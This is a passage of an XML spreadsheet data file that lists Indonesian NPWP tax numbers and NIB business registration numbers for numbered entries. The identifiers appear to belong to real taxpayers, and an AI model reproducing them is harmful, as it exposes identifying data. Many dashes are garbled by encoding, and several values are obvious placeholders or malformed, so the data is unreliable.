  </r>
  <r>
    <x v="308"/>
    <s v="nib"/>
    <n v="9120207372677"/>
  </r>
  <r>
    <x v="309"/>
    <s v="npwp"/>
    <s v="71.323.777.4‚Äì507.000"/>
  </r>
  <r>
    <x v="310"/>
    <s v="npwp"/>
    <s v="74.719.423.1‚Äì507.000"/>
  </r>
  <r>
    <x v="311"/>
    <s v="npwp"/>
    <s v="74.719.423.1‚Äì507.000"/>
  </r>
  <r>
    <x v="312"/>
    <s v="npwp"/>
    <s v="74.719.423.1‚Äì507.000"/>
  </r>
  <r>
    <x v="313"/>
    <s v="npwp"/>
    <s v="74.719.423.1‚Äì507.000"/>
  </r>
  <r>
    <x v="314"/>
    <s v="npwp"/>
    <s v="66.431.024.0‚Äì041.000"/>
  </r>
  <r>
    <x v="314"/>
    <s v="nib"/>
    <n v="8120106843304"/>
  </r>
  <r>
    <x v="315"/>
    <s v="npwp"/>
    <s v="06.656.767.8‚Äì701.000"/>
  </r>
  <r>
    <x v="316"/>
    <s v="npwp"/>
    <s v="36.347.884.3‚Äì702.000"/>
  </r>
  <r>
    <x v="317"/>
    <s v="npwp"/>
    <s v="01.810.726.8‚Äì816.000"/>
  </r>
  <r>
    <x v="317"/>
    <s v="nib"/>
    <n v="8120114011174"/>
  </r>
  <r>
    <x v="318"/>
    <s v="npwp"/>
    <s v="01.896.243.1‚Äì503.000"/>
  </r>
  <r>
    <x v="319"/>
    <s v="npwp"/>
    <s v="31.558.137.1‚Äì034.000"/>
  </r>
  <r>
    <x v="320"/>
    <s v="npwp"/>
    <s v="73‚Äì514‚Äì610‚Äì2‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="321"/>
    <s v="npwp"/>
    <s v="80.462.490.6‚Äì451.000"/>
  </r>
  <r>
    <x v="322"/>
    <s v="npwp"/>
    <s v="31.182.774.5‚Äì411.000"/>
  </r>
  <r>
    <x v="323"/>
    <s v="npwp"/>
    <s v="72.468.251.3‚Äì047.000"/>
  </r>
  <r>
    <x v="324"/>
    <s v="npwp"/>
    <s v="02.461.328.3‚Äì047.000"/>
  </r>
  <r>
    <x v="325"/>
    <s v="npwp"/>
    <s v="02.831.034.0‚Äì041.000"/>
  </r>
  <r>
    <x v="326"/>
    <s v="npwp"/>
    <s v="01.777.129.6‚Äì904.000"/>
  </r>
  <r>
    <x v="327"/>
    <s v="npwp"/>
    <s v="01.873.051.5‚Äì901.000"/>
  </r>
  <r>
    <x v="328"/>
    <s v="npwp"/>
    <s v="01.070.905.3‚Äì903.001"/>
  </r>
  <r>
    <x v="329"/>
    <s v="npwp"/>
    <s v="01.728.204.7‚Äì903.000"/>
  </r>
  <r>
    <x v="329"/>
    <s v="nib"/>
    <n v="8120000711849"/>
  </r>
  <r>
    <x v="330"/>
    <s v="npwp"/>
    <s v="01.885.663.3‚Äì904.000"/>
  </r>
  <r>
    <x v="331"/>
    <s v="npwp"/>
    <s v="01.475.015.2‚Äì904.000"/>
  </r>
  <r>
    <x v="331"/>
    <s v="nib"/>
    <n v="9120009291124"/>
  </r>
  <r>
    <x v="332"/>
    <s v="npwp"/>
    <s v="02.755.052.4‚Äì541.000"/>
  </r>
  <r>
    <x v="333"/>
    <s v="npwp"/>
    <s v="01.680.911.3‚Äì041.000"/>
  </r>
  <r>
    <x v="334"/>
    <s v="npwp"/>
    <s v="31.523.512.7‚Äì418.000"/>
  </r>
  <r>
    <x v="335"/>
    <s v="npwp"/>
    <s v="02.932.684.0‚Äì042.000"/>
  </r>
  <r>
    <x v="336"/>
    <s v="npwp"/>
    <s v="02.830.805.4‚Äì412.000"/>
  </r>
  <r>
    <x v="337"/>
    <s v="npwp"/>
    <s v="12.323.222.1‚Äì233.312"/>
  </r>
  <r>
    <x v="338"/>
    <s v="npwp"/>
    <s v="01.344.492.2‚Äì041.000"/>
  </r>
  <r>
    <x v="339"/>
    <s v="npwp"/>
    <s v="31.467.219.7‚Äì041.000"/>
  </r>
  <r>
    <x v="340"/>
    <s v="npwp"/>
    <s v="07‚Äì651‚Äì025‚Äì4‚Äì330‚Äì000"/>
  </r>
  <r>
    <x v="341"/>
    <s v="npwp"/>
    <s v="01‚Äì721‚Äì208‚Äì5‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="342"/>
    <s v="npwp"/>
    <s v="31‚Äì344‚Äì066‚Äì1‚Äì013‚Äì000"/>
  </r>
  <r>
    <x v="343"/>
    <s v="npwp"/>
    <s v="03‚Äì186‚Äì590‚Äì0‚Äì063‚Äì000"/>
  </r>
  <r>
    <x v="343"/>
    <s v="nib"/>
    <n v="8120100961141"/>
  </r>
  <r>
    <x v="344"/>
    <s v="npwp"/>
    <s v="01‚Äì665‚Äì828‚Äì8‚Äì441‚Äì000"/>
  </r>
  <r>
    <x v="344"/>
    <s v="nib"/>
    <n v="8120103950559"/>
  </r>
  <r>
    <x v="345"/>
    <s v="npwp"/>
    <s v="01‚Äì300‚Äì156‚Äì5‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="345"/>
    <s v="nib"/>
    <n v="8120105882036"/>
  </r>
  <r>
    <x v="346"/>
    <s v="npwp"/>
    <s v="01‚Äì363‚Äì271‚Äì6‚Äì046‚Äì000"/>
  </r>
  <r>
    <x v="346"/>
    <s v="nib"/>
    <n v="9120100970142"/>
  </r>
  <r>
    <x v="347"/>
    <s v="npwp"/>
    <s v="73‚Äì079‚Äì451‚Äì8‚Äì701‚Äì000"/>
  </r>
  <r>
    <x v="348"/>
    <s v="npwp"/>
    <s v="75‚Äì291‚Äì488‚Äì7‚Äì413‚Äì000"/>
  </r>
  <r>
    <x v="349"/>
    <s v="npwp"/>
    <s v="01.000.065.1-941.003"/>
  </r>
  <r>
    <x v="350"/>
    <s v="npwp"/>
    <s v="02‚Äì798‚Äì006‚Äì9‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="351"/>
    <s v="npwp"/>
    <s v="02‚Äì916‚Äì002‚Äì5‚Äì705‚Äì000"/>
  </r>
  <r>
    <x v="352"/>
    <s v="npwp"/>
    <s v="82‚Äì456‚Äì655‚Äì8‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="353"/>
    <s v="npwp"/>
    <s v="02‚Äì747‚Äì289‚Äì3‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="354"/>
    <s v="npwp"/>
    <s v="83‚Äì408‚Äì811‚Äì4‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="354"/>
    <s v="nib"/>
    <n v="8120001731617"/>
  </r>
  <r>
    <x v="355"/>
    <s v="npwp"/>
    <s v="03‚Äì281‚Äì047‚Äì5‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="355"/>
    <s v="nib"/>
    <n v="8120004812047"/>
  </r>
  <r>
    <x v="356"/>
    <s v="npwp"/>
    <s v="03‚Äì040‚Äì411‚Äì5‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="356"/>
    <s v="nib"/>
    <n v="8120001840394"/>
  </r>
  <r>
    <x v="357"/>
    <s v="npwp"/>
    <s v="21‚Äì068‚Äì377‚Äì7‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="358"/>
    <s v="npwp"/>
    <s v="74‚Äì381‚Äì224‚Äì0‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="358"/>
    <s v="nib"/>
    <n v="8120000702827"/>
  </r>
  <r>
    <x v="359"/>
    <s v="npwp"/>
    <s v="01‚Äì571‚Äì740‚Äì8‚Äì627‚Äì001"/>
  </r>
  <r>
    <x v="359"/>
    <s v="nib"/>
    <n v="9120303301223"/>
  </r>
  <r>
    <x v="360"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="360"/>
    <s v="nib"/>
    <n v="8120105822897"/>
  </r>
  <r>
    <x v="361"/>
    <s v="npwp"/>
    <s v="31‚Äì533‚Äì808‚Äì7‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="361"/>
    <s v="nib"/>
    <n v="9120104122289"/>
  </r>
  <r>
    <x v="362"/>
    <s v="npwp"/>
    <s v="66‚Äì914‚Äì336‚Äì4‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="362"/>
    <s v="nib"/>
    <n v="9120107151974"/>
  </r>
  <r>
    <x v="363"/>
    <s v="npwp"/>
    <s v="74‚Äì316‚Äì558‚Äì1‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="363"/>
    <s v="nib"/>
    <n v="9120009320172"/>
  </r>
  <r>
    <x v="364"/>
    <s v="npwp"/>
    <s v="02‚Äì535‚Äì044‚Äì8‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="365"/>
    <s v="npwp"/>
    <s v="73‚Äì524‚Äì042‚Äì6‚Äì428‚Äì000"/>
  </r>
  <r>
    <x v="366"/>
    <s v="npwp"/>
    <s v="02‚Äì115‚Äì963‚Äì7‚Äì056‚Äì000"/>
  </r>
  <r>
    <x v="367"/>
    <s v="npwp"/>
    <s v="02‚Äì270‚Äì012‚Äì4‚Äì043‚Äì000"/>
  </r>
  <r>
    <x v="368"/>
    <s v="npwp"/>
    <s v="02‚Äì384‚Äì452‚Äì5‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="369"/>
    <s v="npwp"/>
    <s v="01‚Äì535‚Äì215‚Äì6‚Äì648‚Äì001"/>
  </r>
  <r>
    <x v="369"/>
    <s v="nib"/>
    <n v="8120117122924"/>
  </r>
  <r>
    <x v="370"/>
    <s v="npwp"/>
    <s v="12‚Äì345‚Äì678‚Äì9‚Äì123‚Äì456"/>
  </r>
  <r>
    <x v="371"/>
    <s v="npwp"/>
    <s v="31‚Äì315‚Äì908‚Äì9‚Äì043‚Äì000"/>
  </r>
  <r>
    <x v="372"/>
    <s v="npwp"/>
    <s v="12‚Äì345‚Äì678‚Äì9‚Äì876‚Äì543"/>
  </r>
  <r>
    <x v="373"/>
    <s v="npwp"/>
    <s v="03‚Äì040‚Äì253‚Äì1‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="373"/>
    <s v="nib"/>
    <n v="8120001721829"/>
  </r>
  <r>
    <x v="374"/>
    <s v="npwp"/>
    <s v="02‚Äì696‚Äì710‚Äì9‚Äì045‚Äì000"/>
  </r>
  <r>
    <x v="374"/>
    <s v="nib"/>
    <n v="8120108742363"/>
  </r>
  <r>
    <x v="375"/>
    <s v="npwp"/>
    <s v="83‚Äì280‚Äì855‚Äì4‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="376"/>
    <s v="npwp"/>
    <s v="03‚Äì319‚Äì044‚Äì8‚Äì042‚Äì000"/>
  </r>
  <r>
    <x v="376"/>
    <s v="nib"/>
    <n v="8120002900728"/>
  </r>
  <r>
    <x v="377"/>
    <s v="npwp"/>
    <s v="01‚Äì235‚Äì709‚Äì1‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="377"/>
    <s v="nib"/>
    <n v="8120100961602"/>
  </r>
  <r>
    <x v="378"/>
    <s v="npwp"/>
    <s v="01‚Äì082‚Äì928‚Äì1‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="378"/>
    <s v="nib"/>
    <n v="9120009421389"/>
  </r>
  <r>
    <x v="379"/>
    <s v="npwp"/>
    <s v="01‚Äì496‚Äì911‚Äì7‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="380"/>
    <s v="npwp"/>
    <s v="80‚Äì612‚Äì793‚Äì2‚Äì501‚Äì000"/>
  </r>
  <r>
    <x v="381"/>
    <s v="npwp"/>
    <s v="31‚Äì509‚Äì719‚Äì6‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="381"/>
    <s v="nib"/>
    <n v="9120005340124"/>
  </r>
  <r>
    <x v="382"/>
    <s v="npwp"/>
    <s v="02‚Äì206‚Äì641‚Äì9‚Äì645‚Äì000"/>
  </r>
  <r>
    <x v="383"/>
    <s v="npwp"/>
    <s v="01‚Äì069‚Äì501‚Äì3‚Äì624‚Äì002"/>
  </r>
  <r>
    <x v="383"/>
    <s v="nib"/>
    <n v="9120307462397"/>
  </r>
  <r>
    <x v="384"/>
    <s v="npwp"/>
    <s v="72.999.441.8‚Äì112.001"/>
  </r>
  <r>
    <x v="384"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="385"/>
    <s v="npwp"/>
    <s v="01‚Äì310‚Äì957‚Äì5‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="385"/>
    <s v="nib"/>
    <n v="8120213051393"/>
  </r>
  <r>
    <x v="386"/>
    <s v="npwp"/>
    <s v="02‚Äì442‚Äì671‚Äì0‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="386"/>
    <s v="nib"/>
    <n v="8120013052379"/>
  </r>
  <r>
    <x v="387"/>
    <s v="npwp"/>
    <s v="31‚Äì294‚Äì754‚Äì2‚Äì435‚Äì000"/>
  </r>
  <r>
    <x v="388"/>
    <s v="npwp"/>
    <s v="82‚Äì698‚Äì727‚Äì3‚Äì437‚Äì000"/>
  </r>
  <r>
    <x v="389"/>
    <s v="npwp"/>
    <s v="22‚Äì222‚Äì222‚Äì2‚Äì222‚Äì222"/>
  </r>
  <r>
    <x v="390"/>
    <s v="npwp"/>
    <s v="02‚Äì871‚Äì594‚Äì4‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="391"/>
    <s v="npwp"/>
    <s v="12‚Äì312‚Äì312‚Äì3‚Äì111‚Äì113"/>
  </r>
  <r>
    <x v="391"/>
    <s v="nib"/>
    <n v="8120000741033"/>
  </r>
  <r>
    <x v="392"/>
    <s v="npwp"/>
    <s v="33‚Äì333‚Äì333‚Äì3‚Äì333‚Äì333"/>
  </r>
  <r>
    <x v="393"/>
    <s v="npwp"/>
    <s v="70.829.728.8‚Äì124.000"/>
  </r>
  <r>
    <x v="393"/>
    <s v="nib"/>
    <n v="8120201890372"/>
  </r>
  <r>
    <x v="394"/>
    <s v="npwp"/>
    <s v="09.705.477.9‚Äì122.000"/>
  </r>
  <r>
    <x v="395"/>
    <s v="npwp"/>
    <s v="09.705.477.9‚Äì122.000"/>
  </r>
  <r>
    <x v="396"/>
    <s v="npwp"/>
    <s v="21‚Äì100‚Äì626‚Äì7‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="397"/>
    <s v="npwp"/>
    <s v="21‚Äì345‚Äì646‚Äì5‚Äì465‚Äì487"/>
  </r>
  <r>
    <x v="398"/>
    <s v="npwp"/>
    <s v="02‚Äì437‚Äì371‚Äì4‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="398"/>
    <s v="nib"/>
    <n v="8120100871354"/>
  </r>
  <r>
    <x v="399"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="399"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="400"/>
    <s v="npwp"/>
    <s v="02‚Äì932‚Äì771‚Äì5‚Äì042‚Äì000"/>
  </r>
  <r>
    <x v="401"/>
    <s v="npwp"/>
    <s v="80‚Äì301‚Äì342‚Äì4‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="401"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="402"/>
    <s v="npwp"/>
    <s v="03‚Äì201‚Äì605‚Äì7‚Äì611‚Äì000"/>
  </r>
  <r>
    <x v="403"/>
    <s v="npwp"/>
    <s v="31‚Äì523‚Äì180‚Äì3‚Äì452‚Äì001"/>
  </r>
  <r>
    <x v="403"/>
    <s v="nib"/>
    <n v="9120405312217"/>
  </r>
  <r>
    <x v="404"/>
    <s v="npwp"/>
    <s v="83‚Äì043‚Äì706‚Äì7‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="405"/>
    <s v="npwp"/>
    <s v="31‚Äì183‚Äì349‚Äì5‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="406"/>
    <s v="npwp"/>
    <s v="89‚Äì725‚Äì394‚Äì4‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="407"/>
    <s v="npwp"/>
    <s v="02‚Äì051‚Äì403‚Äì0‚Äì823‚Äì001"/>
  </r>
  <r>
    <x v="408"/>
    <s v="npwp"/>
    <s v="01‚Äì345‚Äì593‚Äì8‚Äì046‚Äì000"/>
  </r>
  <r>
    <x v="409"/>
    <s v="npwp"/>
    <s v="02‚Äì101‚Äì374‚Äì3‚Äì042‚Äì000"/>
  </r>
  <r>
    <x v="410"/>
    <s v="npwp"/>
    <s v="31‚Äì315‚Äì908‚Äì9‚Äì043‚Äì000"/>
  </r>
  <r>
    <x v="411"/>
    <s v="npwp"/>
    <s v="01‚Äì001‚Äì887‚Äì7‚Äì046‚Äì000"/>
  </r>
  <r>
    <x v="412"/>
    <s v="npwp"/>
    <s v="83‚Äì734‚Äì358‚Äì1‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="412"/>
    <s v="nib"/>
    <n v="8120105870213"/>
  </r>
  <r>
    <x v="413"/>
    <s v="npwp"/>
    <s v="02‚Äì356‚Äì737‚Äì3‚Äì431‚Äì000"/>
  </r>
  <r>
    <x v="413"/>
    <s v="nib"/>
    <n v="8120001960656"/>
  </r>
  <r>
    <x v="414"/>
    <s v="npwp"/>
    <s v="02‚Äì978‚Äì582‚Äì1‚Äì451‚Äì000"/>
  </r>
  <r>
    <x v="415"/>
    <s v="npwp"/>
    <s v="01‚Äì071‚Äì146‚Äì3‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="416"/>
    <s v="npwp"/>
    <s v="03‚Äì311‚Äì525‚Äì4‚Äì011‚Äì000"/>
  </r>
  <r>
    <x v="417"/>
    <s v="npwp"/>
    <s v="03‚Äì221‚Äì118‚Äì7‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="418"/>
    <s v="npwp"/>
    <s v="02‚Äì009‚Äì822‚Äì4‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="418"/>
    <s v="nib"/>
    <n v="220600990038"/>
  </r>
  <r>
    <x v="419"/>
    <s v="npwp"/>
    <s v="08‚Äì328‚Äì638‚Äì5‚Äì722‚Äì002"/>
  </r>
  <r>
    <x v="420"/>
    <s v="npwp"/>
    <s v="01‚Äì409‚Äì482‚Äì5‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="420"/>
    <s v="nib"/>
    <n v="8120110120799"/>
  </r>
  <r>
    <x v="421"/>
    <s v="npwp"/>
    <s v="03‚Äì167‚Äì456‚Äì7‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="421"/>
    <s v="nib"/>
    <n v="8120101881551"/>
  </r>
  <r>
    <x v="422"/>
    <s v="npwp"/>
    <s v="31‚Äì182‚Äì688‚Äì7‚Äì543‚Äì000"/>
  </r>
  <r>
    <x v="423"/>
    <s v="npwp"/>
    <s v="01‚Äì898‚Äì253‚Äì8‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="423"/>
    <s v="nib"/>
    <n v="9120002220599"/>
  </r>
  <r>
    <x v="424"/>
    <s v="npwp"/>
    <s v="01‚Äì716‚Äì297‚Äì5‚Äì631‚Äì000"/>
  </r>
  <r>
    <x v="424"/>
    <s v="nib"/>
    <n v="8120311151551"/>
  </r>
  <r>
    <x v="425"/>
    <s v="npwp"/>
    <s v="01‚Äì771‚Äì763‚Äì8‚Äì092‚Äì000"/>
  </r>
  <r>
    <x v="425"/>
    <s v="nib"/>
    <n v="8120007800723"/>
  </r>
  <r>
    <x v="426"/>
    <s v="npwp"/>
    <s v="01‚Äì821‚Äì663‚Äì0‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="427"/>
    <s v="npwp"/>
    <s v="73‚Äì605‚Äì634‚Äì2‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="428"/>
    <s v="npwp"/>
    <s v="73‚Äì147‚Äì895‚Äì4‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="428"/>
    <s v="nib"/>
    <n v="9120006451411"/>
  </r>
  <r>
    <x v="429"/>
    <s v="npwp"/>
    <s v="01.964.740.3‚Äì725‚Äì000"/>
  </r>
  <r>
    <x v="429"/>
    <s v="nib"/>
    <n v="8120002911383"/>
  </r>
  <r>
    <x v="430"/>
    <s v="npwp"/>
    <s v="01‚Äì792‚Äì952‚Äì2‚Äì618‚Äì000"/>
  </r>
  <r>
    <x v="431"/>
    <s v="npwp"/>
    <s v="02‚Äì011‚Äì039‚Äì1‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="431"/>
    <s v="nib"/>
    <n v="8120016270476"/>
  </r>
  <r>
    <x v="432"/>
    <s v="npwp"/>
    <s v="81‚Äì559‚Äì843‚Äì8‚Äì501‚Äì000"/>
  </r>
  <r>
    <x v="433"/>
    <s v="npwp"/>
    <s v="14‚Äì015‚Äì699‚Äì3‚Äì402‚Äì001"/>
  </r>
  <r>
    <x v="433"/>
    <s v="nib"/>
    <n v="8120016132901"/>
  </r>
  <r>
    <x v="434"/>
    <s v="npwp"/>
    <s v="02‚Äì293‚Äì607‚Äì4‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="434"/>
    <s v="nib"/>
    <n v="8120004752875"/>
  </r>
  <r>
    <x v="435"/>
    <s v="npwp"/>
    <s v="01‚Äì343‚Äì700‚Äì9‚Äì073‚Äì000"/>
  </r>
  <r>
    <x v="435"/>
    <s v="nib"/>
    <n v="8120214100758"/>
  </r>
  <r>
    <x v="436"/>
    <s v="npwp"/>
    <s v="31‚Äì174‚Äì375‚Äì1‚Äì432‚Äì000"/>
  </r>
  <r>
    <x v="437"/>
    <s v="npwp"/>
    <s v="57‚Äì288‚Äì671‚Äì1‚Äì542‚Äì000"/>
  </r>
  <r>
    <x v="437"/>
    <s v="nib"/>
    <n v="9120002692877"/>
  </r>
  <r>
    <x v="438"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="439"/>
    <s v="npwp"/>
    <s v="02‚Äì461‚Äì369‚Äì7‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="439"/>
    <s v="nib"/>
    <n v="8120015271173"/>
  </r>
  <r>
    <x v="440"/>
    <s v="npwp"/>
    <s v="01.871.142.4-013.000"/>
  </r>
  <r>
    <x v="441"/>
    <s v="npwp"/>
    <s v="01‚Äì141‚Äì082‚Äì6‚Äì627‚Äì001"/>
  </r>
  <r>
    <x v="441"/>
    <s v="nib"/>
    <n v="8120205900342"/>
  </r>
  <r>
    <x v="442"/>
    <s v="npwp"/>
    <s v="31.715.217.1-823.000"/>
  </r>
  <r>
    <x v="442"/>
    <s v="nib"/>
    <n v="9120402382166"/>
  </r>
  <r>
    <x v="443"/>
    <s v="npwp"/>
    <s v="81‚Äì073‚Äì670‚Äì2‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="444"/>
    <s v="npwp"/>
    <s v="02‚Äì643‚Äì974‚Äì5‚Äì403‚Äì000"/>
  </r>
  <r>
    <x v="445"/>
    <s v="npwp"/>
    <s v="03‚Äì092‚Äì570‚Äì5‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="445"/>
    <s v="nib"/>
    <n v="9120008420453"/>
  </r>
  <r>
    <x v="446"/>
    <s v="npwp"/>
    <s v="31‚Äì695‚Äì189‚Äì6‚Äì125‚Äì000"/>
  </r>
  <r>
    <x v="446"/>
    <s v="nib"/>
    <n v="8120014162823"/>
  </r>
  <r>
    <x v="447"/>
    <s v="npwp"/>
    <s v="36‚Äì089‚Äì540‚Äì3‚Äì543‚Äì000"/>
  </r>
  <r>
    <x v="448"/>
    <s v="npwp"/>
    <s v="71‚Äì573‚Äì166‚Äì7‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="448"/>
    <s v="nib"/>
    <n v="8120210060737"/>
  </r>
  <r>
    <x v="449"/>
    <s v="npwp"/>
    <s v="03‚Äì046‚Äì339‚Äì2‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="449"/>
    <s v="nib"/>
    <n v="9120206490326"/>
  </r>
  <r>
    <x v="450"/>
    <s v="npwp"/>
    <s v="01‚Äì371‚Äì518‚Äì0‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="451"/>
    <s v="npwp"/>
    <s v="80‚Äì451‚Äì918‚Äì9‚Äì543‚Äì000"/>
  </r>
  <r>
    <x v="452"/>
    <s v="npwp"/>
    <s v="09‚Äì737‚Äì731‚Äì1‚Äì542‚Äì000"/>
  </r>
  <r>
    <x v="452"/>
    <s v="nib"/>
    <n v="9120105760021"/>
  </r>
  <r>
    <x v="453"/>
    <s v="npwp"/>
    <s v="35‚Äì074‚Äì691‚Äì3‚Äì543‚Äì000"/>
  </r>
  <r>
    <x v="454"/>
    <s v="npwp"/>
    <s v="02‚Äì557‚Äì371‚Äì8‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="455"/>
    <s v="npwp"/>
    <s v="01‚Äì404‚Äì980‚Äì3‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="456"/>
    <s v="npwp"/>
    <s v="02‚Äì267‚Äì977‚Äì3‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="456"/>
    <s v="nib"/>
    <n v="8120115121223"/>
  </r>
  <r>
    <x v="457"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="458"/>
    <s v="npwp"/>
    <s v="02‚Äì256‚Äì989‚Äì1‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="458"/>
    <s v="nib"/>
    <n v="9120405311633"/>
  </r>
  <r>
    <x v="459"/>
    <s v="npwp"/>
    <s v="31‚Äì453‚Äì932‚Äì1‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="460"/>
    <s v="npwp"/>
    <s v="02‚Äì572‚Äì188‚Äì7‚Äì305‚Äì001"/>
  </r>
  <r>
    <x v="461"/>
    <s v="npwp"/>
    <s v="03‚Äì206‚Äì885‚Äì0‚Äì305‚Äì000"/>
  </r>
  <r>
    <x v="461"/>
    <s v="nib"/>
    <n v="9120009110584"/>
  </r>
  <r>
    <x v="462"/>
    <s v="npwp"/>
    <s v="47‚Äì743‚Äì031‚Äì2‚Äì726‚Äì000"/>
  </r>
  <r>
    <x v="463"/>
    <s v="npwp"/>
    <s v="72‚Äì751‚Äì547‚Äì0‚Äì726‚Äì000"/>
  </r>
  <r>
    <x v="464"/>
    <s v="npwp"/>
    <s v="81‚Äì169‚Äì343‚Äì1‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="465"/>
    <s v="npwp"/>
    <s v="68‚Äì237‚Äì392‚Äì3‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="466"/>
    <s v="npwp"/>
    <s v="02‚Äì505‚Äì573‚Äì2‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="467"/>
    <s v="npwp"/>
    <s v="70‚Äì883‚Äì593‚Äì9‚Äì543‚Äì000"/>
  </r>
  <r>
    <x v="468"/>
    <s v="npwp"/>
    <s v="71‚Äì369‚Äì253‚Äì1‚Äì413‚Äì000"/>
  </r>
  <r>
    <x v="469"/>
    <s v="npwp"/>
    <s v="01‚Äì001‚Äì887‚Äì7‚Äì451‚Äì001"/>
  </r>
  <r>
    <x v="469"/>
    <s v="nib"/>
    <n v="8120003852614"/>
  </r>
  <r>
    <x v="470"/>
    <s v="npwp"/>
    <s v="31.700.088.3-721.000"/>
  </r>
  <r>
    <x v="471"/>
    <s v="npwp"/>
    <s v="88‚Äì090‚Äì171‚Äì5‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="472"/>
    <s v="npwp"/>
    <s v="57‚Äì487‚Äì727‚Äì0‚Äì808‚Äì000"/>
  </r>
  <r>
    <x v="473"/>
    <s v="npwp"/>
    <s v="01.876.267.4-801.000"/>
  </r>
  <r>
    <x v="474"/>
    <s v="npwp"/>
    <s v="82‚Äì127‚Äì307‚Äì5‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="475"/>
    <s v="npwp"/>
    <s v="70‚Äì039‚Äì424‚Äì0‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="476"/>
    <s v="npwp"/>
    <s v="31‚Äì523‚Äì522‚Äì6‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="476"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="477"/>
    <s v="npwp"/>
    <n v="68431"/>
  </r>
  <r>
    <x v="478"/>
    <s v="npwp"/>
    <s v="16‚Äì664‚Äì605‚Äì2‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="478"/>
    <s v="nib"/>
    <n v="8120012221859"/>
  </r>
  <r>
    <x v="479"/>
    <s v="npwp"/>
    <s v="89‚Äì153‚Äì150‚Äì1‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="480"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì076‚Äì4‚Äì093‚Äì000"/>
  </r>
  <r>
    <x v="480"/>
    <s v="nib"/>
    <n v="8120106861339"/>
  </r>
  <r>
    <x v="481"/>
    <s v="npwp"/>
    <s v="21‚Äì061‚Äì864‚Äì1‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="482"/>
    <s v="npwp"/>
    <s v="01‚Äì923‚Äì651‚Äì2‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="483"/>
    <s v="npwp"/>
    <s v="02‚Äì303‚Äì971‚Äì2‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="484"/>
    <s v="npwp"/>
    <s v="83‚Äì165‚Äì638‚Äì4‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="484"/>
    <s v="nib"/>
    <n v="9120105341521"/>
  </r>
  <r>
    <x v="485"/>
    <s v="npwp"/>
    <s v="03‚Äì131‚Äì282‚Äì0‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="485"/>
    <s v="nib"/>
    <n v="8120100831361"/>
  </r>
  <r>
    <x v="486"/>
    <s v="npwp"/>
    <s v="02‚Äì092‚Äì571‚Äì5‚Äì305‚Äì000"/>
  </r>
  <r>
    <x v="487"/>
